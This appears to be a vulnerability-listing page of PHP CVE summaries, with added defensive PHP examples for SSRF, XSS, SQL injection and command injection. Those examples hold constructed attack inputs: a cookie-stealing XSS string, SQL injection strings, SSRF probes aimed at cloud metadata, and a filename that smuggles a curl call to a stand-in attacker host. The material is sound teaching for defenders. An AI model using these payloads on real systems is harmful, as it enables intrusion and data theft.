A vulnerability in the General/vehicle/checkup/delete.php component of the Tongda OA business-process automation tool allows an attacker to execute arbitrary SQL code.
The vulnerability in the General/vehicle/checkup/delete.php component of Tongda OA, a business-process automation tool, stems from the absence of measures protecting the structure of an SQL query from user-supplied input. Exploiting it allows a remote attacker to execute arbitrary SQL statements...
CVE-2023-41446
Cross-site scripting vulnerability in phpkobo AjaxNewTicker v1.0.5 allows a remote attacker to execute arbitrary script in a victim's browser via a crafted payload in the title parameter of the index.php component...
PT-2023-27955 · Unknown · Phpkobo Ajaxnewticker
Name of the vulnerable software and affected versions: phpkobo AjaxNewTicker version 1.0.5. Description: a cross-site scripting issue allows a remote attacker to execute arbitrary script in a victim's browser via a crafted payload in the txt parameter of the index.php component. This enables the attacker to inject...
A vulnerability in the text.php component of the LibreY search engine allows an attacker to perform a server-side request forgery (SSRF) attack.
The vulnerability in the text.php component of the LibreY search engine stems from insufficient validation of the request targets it is asked to fetch. Exploiting it allows a remote attacker to perform an SSRF attack...
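The entry above attributes the SSRF to "insufficient checking of incoming requests", that is, the server fetched whatever URL it was handed. The following is an added example, not LibreY's code, of the outbound-URL check that class of bug lacks, written in PHP because the affected component is a PHP script. The function name, the set of probe URLs and the public address used as the "allowed" case are constructed for the demonstration; the check refuses non-HTTP schemes, userinfo, unusual ports, and any literal or resolved address in a private or reserved range.

```php
<?php
// Added example (not LibreY's code): an outbound-URL check of the kind the
// SSRF entry above says was missing. ssrfCheck() and the probe list below
// are constructed for illustration.
declare(strict_types=1);

// Returns null when the URL may be fetched, otherwise the reason it was refused.
function ssrfCheck(string $url): ?string {
    $p = parse_url($url);
    if ($p === false) {
        return 'unparseable URL';
    }
    if (!isset($p['scheme']) || !in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return 'scheme not allowed';            // blocks file://, gopher://, dict:// and relative URLs
    }
    if (!isset($p['host'])) {
        return 'no host';
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return 'userinfo not allowed';          // http://trusted.example@127.0.0.1/ style confusion
    }
    if (isset($p['port']) && !in_array($p['port'], [80, 443], true)) {
        return 'port not allowed';
    }

    $host = trim($p['host'], '[]');             // parse_url() keeps IPv6 brackets
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $addresses = [$host];
    } else {
        // Resolve A and AAAA; an attacker can park an internal AAAA next to a public A.
        $addresses = [];
        foreach (dns_get_record($host, DNS_A | DNS_AAAA) ?: [] as $rr) {
            $addresses[] = $rr['ip'] ?? $rr['ipv6'] ?? '';
        }
        $addresses = array_filter($addresses);
    }
    if ($addresses === []) {
        return 'host does not resolve';         // fail closed
    }
    foreach ($addresses as $ip) {
        // NO_PRIV_RANGE: 10/8, 172.16/12, 192.168/16, fc00::/7
        // NO_RES_RANGE:  127/8, 169.254/16 (cloud metadata), 0/8, 240/4, ::1, fe80::/10, ...
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return "resolves to internal address $ip";
        }
    }
    return null;
}

// Constructed probes; the first uses a public literal IP so the demo needs no DNS.
$probes = [
    'https://93.184.216.34/search?q=librey',
    'http://127.0.0.1/',
    'http://169.254.169.254/latest/meta-data/',
    'http://[::1]/',
    'http://10.0.0.5/',
    'http://93.184.216.34:8080/',
    'file:///etc/passwd',
    'http://public.example@127.0.0.1/',
];
foreach ($probes as $u) {
    $why = ssrfCheck($u);
    printf("%-44s %s\n", $u, $why === null ? 'ALLOWED' : "BLOCKED: $why");
}
```

Two caveats a practitioner would add. The resolve-then-check step is a time-of-check/time-of-use gap: a hostname can answer with a public address to this check and an internal one to the actual fetch (DNS rebinding), so the HTTP client should be pinned to the address that passed (for curl, `CURLOPT_RESOLVE`) and redirects must either be disabled or re-validated per hop. For a metasearch engine that only ever talks to a handful of upstream engines, an allow-list of hostnames is simpler and stronger than any block-list, and the range check then serves as defence in depth.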
CVE-2023-37165
Millhouse-Project v1.414 was discovered to contain a remote code execution (RCE) vulnerability via the component /addpostsql.php...
Human Resource Management System SQL Injection Vulnerability
Human Resource Management System is a human resource management system by the independent developer maverickosama. A security vulnerability exists in Human Resource Management System v1.0, stemming from the stateedit parameter of its /hrm/state.php component, which allows an attacker to carry out SQL...
Online Examination System Cross-Site Scripting Vulnerability
SourceCodester Online Examination System is an online examination system from Sourcecodester, Inc. A cross-site scripting vulnerability exists in version 1.0 of the Online Examination System, stemming from its index.php component, which allows an attacker to carry out reflected...
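Both the AjaxNewTicker entries and the Online Examination System entry describe the same pattern: a request parameter reflected into an index.php response without output encoding. The block below is an added example, not code from phpkobo or SourceCodester, showing such a sink first unsafe and then hardened. The parameter name "title", the markup and the attacker string are constructed for illustration; the point is that "execute arbitrary code" in these advisories means script running in the victim's browser, and that the fix is context-appropriate encoding at the point of output.

```php
<?php
// Added example (not phpkobo's or SourceCodester's code): a reflected-XSS
// sink shown unsafe and hardened. Parameter name, markup and the crafted
// value are constructed for the demonstration.
declare(strict_types=1);

// Constructed attacker input, what a crafted ?title=... might carry. It
// targets two contexts at once: a text node and a double-quoted attribute.
$crafted = '<img src=x onerror=alert(document.cookie)>" autofocus onfocus="alert(1)';

// Unsafe: the request value is written straight into the response body.
function renderVulnerable(string $title): string {
    return "<h1>$title</h1>\n"
         . "<input name=\"title\" value=\"$title\">\n";
}

// Hardened: encode at the point of output for the HTML context being written.
// ENT_QUOTES escapes both quote characters so an attribute value cannot be
// closed early; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning
// an empty string, which would otherwise blank part of the page silently.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderHardened(string $title): string {
    $safe = h($title);
    return "<h1>$safe</h1>\n"
         . "<input name=\"title\" value=\"$safe\">\n";
}

// In a web context this is the real $_GET['title']; on the CLI we fall back
// to the constructed payload so the example runs stand-alone.
$title = $_GET['title'] ?? $crafted;

echo "--- vulnerable (a browser would execute the injected handlers) ---\n";
echo renderVulnerable($title);
echo "--- hardened (same bytes, now inert character references) ---\n";
echo renderHardened($title);
```

htmlspecialchars() is the right encoder for HTML text and quoted attribute values only; a value that lands inside a script block, an event handler, a URL or CSS needs the encoder for that context, and a Content-Security-Policy that disallows inline script limits the damage when an encoding is missed.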
CVE-2022-28524
ED01-CMS v20180505 was discovered to contain a SQL injection vulnerability via the component post.php...
CVE-2022-25403
HMS v1.0 was discovered to contain a SQL injection vulnerability via the component admin.php...
CVE-2020-18646
Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component "/public/index.php"...
CVE-2021-34812
Use of hard-coded credentials vulnerability in php component in Synology Calendar before 2.4.0-0761 allows remote attackers to obtain sensitive information via unspecified vectors...
CVE-2021-29090
Improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability in PHP component in Synology Photo Station before 6.8.14-3500 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors...
SQL injection
Improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability in PHP component in Synology Photo Station before 6.8.14-3500 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors...
Nagios Security Vulnerability
Nagios is a set of open-source, free network monitoring tools from the American company Nagios. A security vulnerability exists in Nagios Fusion version 4.1.8 and earlier that an attacker can exploit to escalate privileges to the Nagios service account by installing a malicious component containing PHP...
CVE-2019-13076
Quest KACE Systems Management Appliance Server Center 9.1.317 is vulnerable to SQL injection. An authenticated user can execute arbitrary SQL against the database. The affected component is /userui/ticketlist.php, and the affected parameters are order0column and order0dir...
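Most SQL injection entries on this page (Tongda OA delete.php, the HRM state.php stateedit parameter, ED01-CMS post.php, HMS admin.php) are the classic value-position case, while the KACE ticketlist.php entry is the less obvious identifier-position case: order0column and order0dir feed an ORDER BY clause, where a placeholder cannot be used. The block below is an added example, not code from any of these vendors, that shows both shapes vulnerable and hardened against an in-memory SQLite database. The table and column names (tickets, id, title, created) and the attacker strings are assumptions for the demonstration.

```php
<?php
// Added example, not code from Tongda OA, the HRM system or Quest KACE:
// the two SQL injection shapes from the entries above, each shown vulnerable
// and hardened. In-memory SQLite stands in for the real schema; table and
// column names are assumptions for the demo.
declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE tickets (id INTEGER PRIMARY KEY, title TEXT, created TEXT)');

function seed(PDO $db): void {
    $db->exec('DELETE FROM tickets');
    $db->exec("INSERT INTO tickets (id, title, created) VALUES
        (1, 'first', '2023-01-01'), (2, 'second', '2023-02-01'), (3, 'third', '2023-03-01')");
}

// 1. Value position (the delete.php / state.php pattern): the request value is
//    pasted into the statement text, so it can rewrite the WHERE clause.
function deleteVulnerable(PDO $db, string $id): int {
    return $db->exec("DELETE FROM tickets WHERE id = $id");
}

// Hardened: validate the shape, then bind. A bound parameter is sent as data and
// never parsed as SQL, so the statement structure is fixed before input arrives.
function deleteHardened(PDO $db, string $id): int {
    if (!ctype_digit($id)) {
        throw new InvalidArgumentException("id must be a non-negative integer, got '$id'");
    }
    $stmt = $db->prepare('DELETE FROM tickets WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// 2. Identifier position (the ticketlist.php order0column / order0dir pattern):
//    ORDER BY takes column names and keywords, which placeholders cannot carry,
//    so a prepared statement alone does not help. Map the request value onto an
//    allow-list and interpolate only the list's own entry.
const SORTABLE_COLUMNS = ['id', 'title', 'created'];

function listHardened(PDO $db, string $column, string $dir): array {
    if (!in_array($column, SORTABLE_COLUMNS, true)) {
        throw new InvalidArgumentException("unknown sort column '$column'");
    }
    $dir = strtoupper($dir) === 'DESC' ? 'DESC' : 'ASC';   // anything else collapses to ASC
    $stmt = $db->query("SELECT id, title FROM tickets ORDER BY \"$column\" $dir");
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demonstration with constructed attacker input.
seed($db);
printf("vulnerable delete with '1 OR 1=1' removed %d row(s)\n", deleteVulnerable($db, '1 OR 1=1'));

seed($db);
try {
    deleteHardened($db, '1 OR 1=1');
} catch (InvalidArgumentException $e) {
    echo 'hardened delete rejected input: ', $e->getMessage(), "\n";
}
printf("hardened delete with '1' removed %d row(s)\n", deleteHardened($db, '1'));

try {
    listHardened($db, 'title; DROP TABLE tickets; --', 'asc');
} catch (InvalidArgumentException $e) {
    echo 'hardened list rejected input: ', $e->getMessage(), "\n";
}
foreach (listHardened($db, 'created', 'desc') as $row) {
    echo $row['id'], ' ', $row['title'], "\n";
}
```

The vulnerable delete removes every row because the pasted value turns the predicate into `id = 1 OR 1=1`; the hardened version refuses the same string before it reaches the database. For the ORDER BY case the key design choice is that user input is only ever compared against the allow-list, never copied into the query, so even a valid-looking column name the application does not intend to expose is rejected.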
Denial Of Service (DoS)
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. The php54 packages provide a recent stable release of PHP with the PEAR 1.9.4, APC 3.1.15, and memcache 3.0.8 PECL extensions, and a number of additional utilities. The php54 packages have been upgraded to...
elFinder Command Injection (versions < 2.1.48)
elFinder is an open-source file manager available as a web application. A command injection vulnerability in the image handling functionality exists for versions prior to 2.1.48. This exploit requires that the exiftran utility be installed. Recent assessments: space-r7 at May 09, 2019 5:57pm UTC...
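The entry above places the command injection in elFinder's image handling and notes that the exploit needs the exiftran utility present, which points at a filename reaching a shell command. The following is an added example, not elFinder's code, of how that happens and of two hardening steps: quoting the argument if a shell is unavoidable, and dropping the shell entirely with an argv-style proc_open() plus path containment. The upload directory, helper names and the crafted filename are constructed for illustration.

```php
<?php
// Added example (not elFinder's code): a filename reaching exiftran, first by
// string interpolation (the command injection the entry above describes) and
// then hardened. UPLOAD_DIR, the helper names and the crafted filename are
// constructed for illustration.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/uploads';

// Vulnerable: the user-controlled filename becomes shell syntax.
function exiftranCommandVulnerable(string $file): string {
    return 'exiftran -a -i ' . UPLOAD_DIR . '/' . $file . ' 2>&1';
}

// Hardened step 1: if a shell must be used, every dynamic token is quoted so
// ; | $() and backticks are literal bytes inside one argument.
function exiftranCommandQuoted(string $file): string {
    return 'exiftran -a -i ' . escapeshellarg(UPLOAD_DIR . '/' . $file) . ' 2>&1';
}

// Hardened step 2: do not involve a shell at all. proc_open() with an array
// (PHP >= 7.4) passes argv directly to the program, and stderr is captured via
// a pipe instead of a "2>&1" redirection. The path is also confined to the
// upload directory before anything touches it.
function exiftranRun(string $file): array {
    $base = realpath(UPLOAD_DIR);
    $real = realpath(UPLOAD_DIR . '/' . $file);
    if ($base === false || $real === false
            || strncmp($real, $base . '/', strlen($base) + 1) !== 0) {
        return ['status' => -1, 'output' => 'refused: path missing or outside upload dir'];
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['exiftran', '-a', '-i', $real], $spec, $pipes);
    if (!is_resource($proc)) {
        return ['status' => -1, 'output' => 'exiftran could not be started'];
    }
    $out = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    return ['status' => proc_close($proc), 'output' => $out];
}

// Constructed attacker-controlled filename.
$file = 'photo.jpg; curl http://attacker.example/$(id) #';

echo "vulnerable: ", exiftranCommandVulnerable($file), "\n";
echo "quoted:     ", exiftranCommandQuoted($file), "\n";

// The shell-free runner only does real work where the upload dir exists;
// elsewhere it fails closed, which is the behaviour we want from it anyway.
print_r(exiftranRun($file));
```

The vulnerable string hands the shell a second command after the `;`, which is exactly the elFinder failure mode. escapeshellarg() closes that hole but still leaves a shell in the loop and relies on every call site remembering to use it, which is why the argv form is the preferable end state: with no shell there is nothing for metacharacters to mean, and the remaining risk is reduced to whether exiftran itself parses the file safely.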
jQuery-File-Upload < v9.22.1 (ImageMagick / Ghostscript) - Remote Code Execution Exploit
Exploit for php platform in category web applications jQuery-File-Upload is the second most starred jQuery project on GitHub, after the jQuery framework itself. The project was recently reported to have a three-year-old arbitrary file upload vulnerability that was fixed in the release of v9.22.2,...
PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer SQL Injection Software Link: http://www.pacsone.net/download.htm Version: PACSOne Server 6.6.2 Exploit Author: Carlos Avila Google Dork: inurl:pacs/login.php inurl:pacsone/login.php...